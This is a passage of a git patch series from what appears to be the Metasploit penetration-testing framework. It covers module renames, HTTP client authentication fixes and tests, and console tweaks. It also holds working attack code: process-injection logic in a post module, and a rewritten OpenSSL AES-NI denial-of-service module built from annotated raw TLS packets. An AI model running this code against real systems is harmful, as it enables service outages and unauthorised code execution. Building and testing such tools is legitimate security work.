ReflectiveLoader function!" if offset == 0 + raise "Can't find an exported ReflectiveLoader function!" if offset.nil? or offset == 0 rescue print_error( "Failed to read and parse Dll file: #{$!}" ) return @@ -60,7 +63,7 @@ class Metasploit3 < Msf::Post def inject_into_pid(pay, pid, offset) - if offset.nil? + if offset.nil? or offset == 0 print_error("Reflective Loader offset is nil.") return end @@ -79,19 +82,19 @@ class Metasploit3 < Msf::Post begin print_status("Opening process #{pid}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - print_status("Generating payload") print_status("Allocating memory in procees #{pid}") mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) # Ensure memory is set for execution host_process.memory.protect(mem) - print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") - print_status("Writing the stager into memory...") + vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") + print_status("Writing the payload into memory") host_process.memory.write(mem, pay) + print_status("Executing payload") host_process.thread.create(mem+offset, 0) print_good("Successfully injected payload in to process: #{pid}") rescue ::Exception => e print_error("Failed to Inject Payload to #{pid}!") - print_error(e.to_s) + vprint_error(e.to_s) end end end From 12247d47ba78d91552d48e523dec714fa805b139 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 4 Mar 2013 10:46:05 -0600 Subject: [PATCH 68/87] Rename module, sorry, no pull request. --- modules/exploits/osx/local/setuid_viscosity.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 4c674f2f07..c70127857e 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, { - 'Name' => 'Setuid Viscosity Exploit', + 'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient From 7fa24d9060bd83487d19089555a14aff127e7cca Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 4 Mar 2013 10:54:33 -0600 Subject: [PATCH 69/87] Module rename --- modules/exploits/osx/local/setuid_tunnelblick.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index e12441c14b..691e167901 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, { - 'Name' => 'Setuid Tunnelblick Exploit', + 'Name' => 'Setuid Tunnelblick Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient From 6dcca7df78c6c1e2f589ed33cedbda652f14710e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 11:24:26 -0600 Subject: [PATCH 70/87] Remove duplicated header issues Headers were getting duped back into client config, causing invalid requests to be sent out --- lib/msf/core/exploit/http/client.rb | 15 +++++---------- lib/rex/proto/http/client.rb | 1 + lib/rex/proto/http/client_request.rb | 7 ++++--- modules/auxiliary/scanner/http/http_login.rb | 7 ++++++- 4 files changed, 16 insertions(+), 14 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6769a44b9a..a156bc4e3a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -145,6 +145,9 @@ module Exploit::Remote::HttpClient dossl = ssl end + client_username = opts['username'] || datastore['USERNAME'] || '' + client_password = opts['password'] || datastore['PASSWORD'] || '' + nclient = Rex::Proto::Http::Client.new( rhost, rport.to_i, @@ -155,8 +158,8 @@ module Exploit::Remote::HttpClient dossl, ssl_version, proxies, - datastore['USERNAME'], - datastore['PASSWORD'] + client_username, + client_password ) # Configure the HTTP client with the supplied parameter @@ -258,10 +261,6 @@ module Exploit::Remote::HttpClient def send_request_raw(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_raw(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -277,10 +276,6 @@ module Exploit::Remote::HttpClient def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 3461a0067e..f360701556 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -158,6 +158,7 @@ class Client opts['port'] = self.port req = ClientRequest.new(opts) + req end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index e0cdb4946f..76a4294af1 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -21,7 +21,7 @@ class ClientRequest 'cgi' => true, 'cookie' => nil, 'data' => '', - 'headers' => {}, + 'headers' => nil, 'raw_headers' => '', 'method' => 'GET', 'path_info' => '', @@ -87,6 +87,7 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) + @opts['headers'] ||= {} end def to_s @@ -165,13 +166,13 @@ class ClientRequest # If an explicit User-Agent header is set, then use that instead of # the default - unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') + unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end # Similar to user-agent, only add an automatic auth header if a # manual one hasn't been provided - unless opts['headers'].keys.map{|x| x.downcase }.include?('authorization') + unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('authorization') req << set_auth_header end diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 40446f68db..0452e583e6 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -66,6 +66,8 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => path, 'method' => datastore['REQUESTTYPE'], + 'username' => '', + 'password' => '' }, 10) next if not res @@ -75,6 +77,8 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => path, 'method' => datastore['REQUESTTYPE'], + 'username' => '', + 'password' => '' }, 10) next if not res end @@ -94,7 +98,8 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - + load "lib/rex/proto/http/client_request.rb" + if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "") print_error("You need need to set AUTH_URI when using PUT Method !") return From 71ba044d03299fc939b2ccf861cb900d830986ed Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 11:25:34 -0600 Subject: [PATCH 71/87] remove debugging aid --- modules/auxiliary/scanner/http/http_login.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 0452e583e6..13a8f2a733 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -98,8 +98,6 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - load "lib/rex/proto/http/client_request.rb" - if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "") print_error("You need need to set AUTH_URI when using PUT Method !") return From cb18b81503b4f23b465020ed63b1676599d09c1c Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 4 Mar 2013 11:59:30 -0600 Subject: [PATCH 72/87] Add spec to ensure auth is sane --- spec/lib/rex/proto/http/client_spec.rb | 49 ++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 3ddd07d6bd..77ca6c4758 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -87,6 +87,55 @@ describe Rex::Proto::Http::Client do end end + context "with credentials" do + subject(:cli) do + cli = Rex::Proto::Http::Client.new(ip) + cli + end + let(:first_response) { + "HTTP/1.1 401 Unauthorized\r\nContent-Length: 0\r\nWWW-Authenticate: Basic realm=\"foo\"\r\n\r\n" + } + let(:authed_response) { + "HTTP/1.1 200 Ok\r\nContent-Length: 0\r\n\r\n" + } + let(:user) { "user" } + let(:pass) { "pass" } + + it "should not send creds on the first request in order to induce a 401" do + req = cli.request_cgi + req.to_s.should_not match("Authorization:") + end + + it "should send creds after receiving a 401" do + conn = mock + conn.stub(:put) + conn.stub(:shutdown) + conn.stub(:close) + + conn.should_receive(:get_once).and_return(first_response, authed_response) + conn.should_receive(:put) do |str_request| + str_request.should_not include("Authorization") + nil + end + conn.should_receive(:put) do |str_request| + str_request.should include("Authorization") + nil + end + + cli.should_receive(:_send_recv).twice.and_call_original + + Rex::Socket::Tcp.stub(:create).and_return(conn) + + opts = { "username" => user, "password" => pass} + req = cli.request_cgi(opts) + cli.send_recv(req) + + # Make sure it didn't modify the argument + opts.should == { "username" => user, "password" => pass} + end + + end + it "should attempt to connect to a server" do this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) expect { this_cli.connect(1) }.to raise_error ::Rex::ConnectionRefused From 867875b4454d3df903eb6d55405f273827f249eb Mon Sep 17 00:00:00 2001 From: Wolfgang Ettlinger Date: Mon, 4 Mar 2013 19:09:50 +0100 Subject: [PATCH 73/87] Beautified OpenSSL-AESNI module Modifed the CVE-2012-2686 module to follow suggestions by @jvazquez-r7: * Added description for all fields in the SSL packets * MAX_TRIES now required * use get_once instead of timeout --- modules/auxiliary/dos/ssl/openssl_aesni.rb | 166 ++++++++++++--------- 1 file changed, 98 insertions(+), 68 deletions(-) diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index d05134f4de..94ba11e470 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -17,8 +17,8 @@ class Metasploit4 < Msf::Auxiliary 'Author' => [ 'Wolfgang Ettlinger ' ], - 'License' => BSD_LICENSE, - 'References' => + 'License' => BSD_LICENSE, + 'References' => [ [ 'CVE', '2012-2686'], [ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt'] @@ -28,74 +28,105 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(443), - OptInt.new('MAX_TRIES', [false, "Maximum number of tries", 300]) + OptInt.new('MAX_TRIES', [true, "Maximum number of tries", 300]) ], self.class) end def run # Client Hello - p1 = - "\x16\x03\x01\x00\x7e\x01\x00\x00\x7a\x03\x02\x50\xeb\xf2\x4a\xaf"<< - "\x74\xf5\xe3\x55\x6a\xae\xcf\x88\x36\x7c\xd9\xe5\x1b\xcc\x09\xee"<< - "\x6f\x42\x30\x3b\x49\x55\xf8\xaa\x11\x32\xeb\x00\x00\x08\xc0\x13"<< - "\x00\x39\x00\x35\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00"<< - "\x01\x02\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b"<< - "\x00\x0c\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06"<< - "\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01"<< - "\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f"<< - "\x00\x01\x01" + p1 = "\x16" # Content Type: Handshake + p1 << "\x03\x01" # Version: TLS 1.0 + p1 << "\x00\x7e" # Length: 126 + p1 << "\x01" # Handshake Type: Client Hello + p1 << "\x00\x00\x7a" # Length: 122 + p1 << "\x03\x02" # Version: TLS 1.1 + p1 << ("A" * 32) # Random + p1 << "\x00" # Session ID Length: 0 + p1 << "\x00\x08" # Cypher Suites Length: 6 + p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA + p1 << "\x00\x39" # - DHE-RSA-AES256-SHA + p1 << "\x00\x35" # - AES256-SHA + p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV + p1 << "\x01" # Compression Methods Length: 1 + p1 << "\x00" # - NULL-Compression + p1 << "\x00\x49" # Extensions Length: 73 + p1 << "\x00\x0b" # - Extension: ec_point_formats + p1 << "\x00\x04" # Length: 4 + p1 << "\x03" # EC Points Format Length: 3 + p1 << "\x00" # - uncompressed + p1 << "\x01" # - ansiX962_compressed_prime + p1 << "\x02" # - ansiX962_compressed_char2 + p1 << "\x00\x0a" # - Extension: elliptic_curves + p1 << "\x00\x34" # Length: 52 + p1 << "\x00\x32" # Elliptic Curves Length: 50 + # 25 Elliptic curves: + p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a" + p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04" + p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10" + p1 << "\x00\x11" + + p1 << "\x00\x23" # - Extension: SessionTicket TLS + p1 << "\x00\x00" # Length: 0 + p1 << "\x00\x0f" # - Extension: Heartbeat + p1 << "\x00\x01" # Length: 1 + p1 << "\x01" # Peer allowed to send requests + + + # Change Cipher Spec Message + p2_cssm = "\x14" # Content Type: Change Cipher Spec + p2_cssm << "\x03\x02" # Version: TLS 1.1 + p2_cssm << "\x00\x01" # Length: 1 + p2_cssm << "\x01" # Change Cipher Spec Message + + + # Encrypted Handshake Message + p2_ehm = "\x16" # Content Type: Handshake + p2_ehm << "\x03\x02" # Version: TLS 1.1 + p2_ehm << "\x00\x40" # Length: 64 + p2_ehm << ("A" * 64) # Encrypted Message + # Client Key Exchange, Change Cipher Spec, Encrypted Handshake # AES256-SHA - p2_aes_sha = - "\x16\x03\x02\x01\x06\x10\x00\x01\x02\x01\x00\x4c\xee\x18\xe2\xec"<< - "\xa9\x9d\xd7\x10\xd0\xff\x6f\xa8\x10\xf5\x9c\xa0\x91\x38\x93\x93"<< - "\xaa\x71\x07\x69\xb6\x22\x81\x2d\xcd\xe0\x8f\x95\xf2\x9b\xaa\x49"<< - "\x18\x15\x53\xc3\x34\x15\x81\xab\x20\x72\x16\x5b\xf2\xca\x13\x9e"<< - "\x11\x6e\x3c\xf5\x71\x7c\x19\xf4\x7d\x35\x71\x25\x6e\xbe\xee\xdf"<< - "\x1d\x55\xc9\x38\xac\xbb\x88\xab\xd0\x18\x7d\x5f\xaa\x3c\x91\x2f"<< - "\xd2\x64\x7c\x15\x91\xa6\xe7\xb7\x0c\x01\xb3\xc7\x37\xc1\x3a\xb2"<< - "\xde\x59\x6e\x8f\x7a\xde\x22\x59\x6c\xb7\x91\x21\x8f\xff\x56\x2c"<< - "\x5f\xfb\x54\x7f\xd1\x1a\x00\x0e\x02\xb2\x4e\x62\xfd\xe2\xc0\x8f"<< - "\x56\x52\x8a\x4c\x44\x01\x5f\x21\xf9\xd5\xb3\xeb\xab\x39\xcf\x4e"<< - "\xed\x78\xad\xea\xc7\x43\x80\x3f\xf2\x41\xbe\x5c\x83\xa5\x54\x6f"<< - "\x3c\xfb\x15\xed\x3c\x83\xf0\x3b\xd2\x7c\x5d\xf6\x82\xcb\x82\xb6"<< - "\x6a\x8e\x94\xf9\x22\x5a\x17\x20\x82\x21\x4e\x83\x01\x81\x06\x9e"<< - "\x21\xba\x16\xa4\xda\xcd\x8e\x1c\x8c\xe7\x19\x96\x2a\xec\x90\x6a"<< - "\x16\xac\x12\x68\xbd\xf7\x4b\x6c\x3c\x91\x8b\xe7\x34\x03\x91\x65"<< - "\x61\x57\xbc\x3a\x66\x3b\x7b\xb1\x57\xcd\x19\x5c\x4a\x69\x43\xb2"<< - "\x67\xaf\x38\x5c\x1a\x7e\x80\x78\x90\x25\xb8\x14\x03\x02\x00\x01"<< - "\x01\x16\x03\x02\x00\x40\x7d\xf4\x2c\x8c\x64\x74\xa5\x98\x02\x41"<< - "\xac\x97\xfd\x53\x15\x4c\xbf\x16\x08\x26\xe0\x6c\x22\x70\x5f\x36"<< - "\x75\x75\x96\xf9\x6b\x9f\xb4\xc3\x38\xa7\x14\xac\x21\x89\xec\xd6"<< - "\x37\x28\xf3\x0d\xdf\xb3\x1b\xac\x96\xf3\x16\x5c\xc3\x6b\x71\x1c"<< - "\xdb\x0d\x04\x96\x21\xd2" + p2_aes_sha = "\x16" # Content Type: Handshake + p2_aes_sha << "\x03\x02" # Version: TLS 1.1 + p2_aes_sha << "\x01\x06" # Length: 262 + p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange + p2_aes_sha << "\x00\x01\x02" # Length: 258 + p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256 + p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant) + p2_aes_sha << p2_cssm # Change Cipher Spec Message + p2_aes_sha << p2_ehm # Encrypted Handshake Message + # DHE-RSA-AES256-SHA - p2_dhe_rsa_aes256_sha = - "\x16\x03\x02\x00\x46\x10\x00\x00\x42\x00\x40\x43\xaf\x48\x16\x8d"<< - "\x17\xb9\xb0\xb6\xbc\x68\xab\x99\xf9\x30\xc9\xb1\xa2\x3b\x4f\x79"<< - "\xaa\x76\x5c\x0d\x61\xa0\x19\x55\x11\x20\xe8\xbb\xab\x69\xf3\xeb"<< - "\xff\x81\x1d\x16\x0d\x03\xaf\xb9\x70\xae\x72\x5c\xd8\xc7\x28\x2c"<< - "\xac\xd5\x84\x2c\xaf\x2a\x57\x46\x71\xca\x73\x14\x03\x02\x00\x01"<< - "\x01\x16\x03\x02\x00\x40\xff\x62\x0f\x7a\xb2\x79\xfe\x78\xce\xb9"<< - "\xde\xc4\xef\x66\x2f\xed\x1a\x37\xfe\x47\xdd\xde\x9c\xe0\x42\xbc"<< - "\x93\x20\x65\x05\xd3\x50\x14\x1c\x6c\xb1\x7a\x3a\x7d\x91\x92\xbb"<< - "\x9d\x42\x78\xbf\xe4\x08\xa0\xfd\x9c\xeb\x24\x29\x3b\xed\xc8\x54"<< - "\x3d\xd3\xa2\xff\xb0\x8b" + p2_dhe = "\x16" # Content Type: Handshake + p2_dhe << "\x03\x02" # Version: TLS 1.1 + p2_dhe << "\x00\x46" # Length: 70 + p2_dhe << "\x10" # Handshake Type: Client Key Exchange + p2_dhe << "\x00\x00\x42" # Length: 66 + p2_dhe << "\x00\x40" # DH Pubkey Length: 64 + p2_dhe << ("A" * 64) # DH Pubkey + p2_dhe << p2_cssm # Change Cipher Spec Message + p2_dhe << p2_ehm # Encrypted Handshake Message + # ECDHE-RSA-AES128-SHA - p2_ecdhe_rsa_aes128_sha = - "\x16\x03\x02\x00\x46\x10\x00\x00\x42\x41\x04\x2f\x22\xf4\x06\x3f"<< - "\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8\x03\xe5\xaa\x36\xeb\x0f"<< - "\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69\x5b\x38\x95\x58\xb6\x0d"<< - "\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6\xb2\xe6\x8b\x2a\xd9\x03"<< - "\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73\x40\x14\x03\x02\x00\x01"<< - "\x01\x16\x03\x02\x00\x40\x8c\xc6\x4d\xdc\x42\x03\x64\xa3\xc0\xf4"<< - "\x94\xda\xa4\x12\x68\x78\xfd\x5b\x44\xaf\xa3\x91\x63\x75\x26\x93"<< - "\x14\xad\x86\xa7\x4f\x5a\x2e\xcb\x13\x17\xb7\xdf\x67\x64\x1b\x10"<< - "\xc3\x9f\x68\xaf\x92\x38\xbf\x67\xc6\x18\x5b\x78\xc9\x99\xc3\x70"<< - "\x89\x09\xe2\x3f\x3e\x1f" + p2_ecdhe = "\x16" # Content Type: Handshake + p2_ecdhe << "\x03\x02" # Version: TLS 1.1 + p2_ecdhe << "\x00\x46" # Length: 70 + p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange + p2_ecdhe << "\x00\x00\x42" # Length: 66 + p2_ecdhe << "\x41" # EC DH Pubkey Length: 65 + # EC DH Pubkey: + p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8" + p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69" + p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6" + p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73" + p2_ecdhe << "\x40" + p2_ecdhe << p2_cssm # Change Cipher Spec Message + p2_ecdhe << p2_ehm # Encrypted Handshake Message + maxtries = datastore['MAX_TRIES'] @@ -112,9 +143,9 @@ class Metasploit4 < Msf::Auxiliary cs = get_cipher_suite(resp) if cs == 0xc013 # ECDHE-RSA-AES128-SHA - p2 = p2_ecdhe_rsa_aes128_sha + p2 = p2_ecdhe elsif cs == 0x0039 # DHE-RSA-AES256-SHA - p2 = p2_dhe_rsa_aes256_sha + p2 = p2_dhe elsif cs == 0x0035 # AES256-SHA p2 = p2_aes_sha else @@ -126,17 +157,16 @@ class Metasploit4 < Msf::Auxiliary alert = nil - timeout(2) do - alert = sock.recv(4096) - end - - disconnect - - if alert == '' + begin + alert = sock.get_once(-1, 2) + rescue EOFError print_status("DoS successful. process on #{rhost} did not respond.") success = true break end + + disconnect + end if success == false @@ -157,7 +187,7 @@ class Metasploit4 < Msf::Auxiliary len = (resp[offset+3, 2]).unpack("n")[0] hstype = (resp[offset+5, 1]).unpack("C")[0] - if hstype == 2 + if hstype == 2 # Server Hello return (resp[offset+44, 2]).unpack("n")[0] end From fb0237a180eccba807c5e3386fb9f740a866ace7 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Mon, 4 Mar 2013 18:26:59 -0600 Subject: [PATCH 74/87] Fix typo --- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 2e24232fe4..04c3696415 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2642,7 +2642,7 @@ class Core if is_metasploit_service_running launch_metasploit_browser else - print_error "Metasploit services aren't running. Type 'service start metasploit' and try again." + print_error "Metasploit services aren't running. Type 'service metasploit start' and try again." end end return true From 370aed5973f603ddff5a903716182954d93ce5b2 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Mon, 4 Mar 2013 18:27:22 -0600 Subject: [PATCH 75/87] Silence status output, it is distracting --- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 04c3696415..62edace397 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2704,7 +2704,7 @@ class Core def is_metasploit_service_running cmd = "/usr/sbin/service" - system(cmd, "metasploit", "status") # Both running returns true, otherwise, false. + system("#{cmd} metasploit status >/dev/null") # Both running returns true, otherwise, false. end def is_metasploit_debian_package_installed From 4e31187f7218c260dcea1235b2a51d3cb556f9f2 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Mon, 4 Mar 2013 18:35:47 -0600 Subject: [PATCH 76/87] Use start.sh to start Pro via go_pro command start.sh (installed with community/pro on apt installs) automatically starts dependency services (such as postgresql). --- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 62edace397..4b1bbb5fe0 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2695,9 +2695,9 @@ class Core end def start_metasploit_service - cmd = "/usr/sbin/service" + cmd = File.expand_path(File.join(msfbase_dir, '..', '..', '..', 'scripts', 'start.sh')) return unless ::File.executable_real? cmd - %x{#{cmd} metasploit start}.each_line do |line| + %x{#{cmd}}.each_line do |line| print_status line.chomp end end From c639de7ccc2806110e30530aec1a689a8b293964 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 5 Mar 2013 12:33:37 -0600 Subject: [PATCH 77/87] fix a major typo snaffu --- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 -- .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 - .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 - .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 --- .../gems/method_source-0.7.1/README.markdown | 91 ---------- .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 -------- .../method_source-0.7.1/lib/method_source.rb | 163 ------------------ .../lib/method_source/source_location.rb | 138 --------------- .../lib/method_source/version.rb | 3 - .../method_source-0.7.1/method_source.gemspec | 33 ---- .../gems/method_source-0.7.1/test/test.rb | 122 ------------- .../method_source-0.7.1/test/test_helper.rb | 50 ------ lib/msf/core/auxiliary/web/http.rb | 7 +- 14 files changed, 3 insertions(+), 725 deletions(-) delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml deleted file mode 100644 index ba51bba6b2..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml +++ /dev/null @@ -1,17 +0,0 @@ -rvm: - - 1.8.7 - - 1.9.2 - - 1.9.3 - - ree - - rbx-18mode - - rbx-19mode - - jruby - -notifications: - irc: "irc.freenode.org#pry" - recipients: - - jrmair@gmail.com - -branches: - only: - - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts deleted file mode 100644 index a4e7838016..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts +++ /dev/null @@ -1 +0,0 @@ --m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile deleted file mode 100644 index e45e65f871..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile +++ /dev/null @@ -1,2 +0,0 @@ -source :rubygems -gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE deleted file mode 100644 index d1a50d62d0..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE +++ /dev/null @@ -1,25 +0,0 @@ -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR 